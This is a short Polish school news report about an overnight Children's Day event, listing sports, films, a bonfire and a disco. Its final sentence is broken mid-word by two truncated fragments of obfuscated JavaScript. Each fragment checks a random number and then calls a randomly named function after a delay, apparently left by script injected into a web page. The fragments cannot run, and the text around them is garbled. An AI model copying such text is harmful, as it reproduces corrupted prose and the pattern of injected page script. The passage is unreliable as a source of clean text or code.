Noc w szkole

Na niecodzienny pomysł spędzenia Dnia Dziecka wpadli nauczyciele naszej szkoły i przygotowali dla uczniów wielką niespodziankę. Dnia 10 czerwca po raz pierwszy w historii naszej szkoły uczniowie zostali w szkole na noc. Cała impreza rozpoczęła się w piątek o godz. 17, a zakończyła się w sobotę o 9 rano. Na cały wieczór zaplanowano wiele atrakcji – konkurencje sportowe, rozgrywki tenisa stołowego, mecz piłki nożnej, wieczór filmowy, ognisko, dyskoteka. Maluchom bardzo przypadły do gustu zabawy na zjeżdżalni. Cisza nocna zapadła około godziny 1 w nocy, choć niektórzy z uczestników nie zmrużyli nawet na chwilę oka. Rano rodzice odom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}debrali ze szkoły dzieci zmęczone, ale przepełnione wrażeniami.